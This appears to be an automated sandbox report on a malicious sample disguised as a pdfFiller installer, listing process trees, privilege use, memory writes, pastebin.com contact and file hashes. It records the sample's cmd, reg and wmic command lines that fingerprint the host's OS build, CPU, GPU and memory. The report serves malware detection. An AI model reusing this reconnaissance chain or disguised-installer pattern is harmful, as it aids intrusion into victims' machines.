0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 1080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 592 wrote to memory of 1080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 592 wrote to memory of 1080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

C:\Users\Admin\AppData\Local\Temp\Install(4).exe

"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"

C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

"C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp" /SL5="$500EE,6038703,916992,C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Program Files (x86)\pdfFiller\pdfFiller.exe

"C:\Program Files (x86)\pdfFiller\pdfFiller.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1468

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

MD5 08722dbbead04e11a0612321f27a375e
SHA1 57edfccdce2937bc6df301b6c5a2e5a97e0ec6c2
SHA256 00e9198b63906a8668f114401b18c95236562a3af9228ad35430f1fab8a884a0
SHA512 ce4888eba51baf13e09b5a0f506be28bfabff4a84831db25993673e30dcf342f54801a1bf8c8bc5898487da91d4b606e5cc8deea2574ed49ce78bf7ab94b0516

memory/400-22-0x0000000000100000-0x00000000001EE000-memory.dmp

memory/400-25-0x0000000000101000-0x00000000001A9000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp

MD5 4d249e135d4ae493ac8a946aa242d48a
SHA1 3ff02b2857f71f81854a6ee6ae2639f18b0ea8aa
SHA256 ad713590abb05f828e36b91ff0c1b1d44cbb61c3b5d40455791f2a7df5763261
SHA512 4031cbb905d9ac0e7f48c4e75171aa7e4df5efad7cd62295faf319aaacbd27baf0afe14a828bf98661164ac01be5589493ede3a82293890756a65bebfe50d089

\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
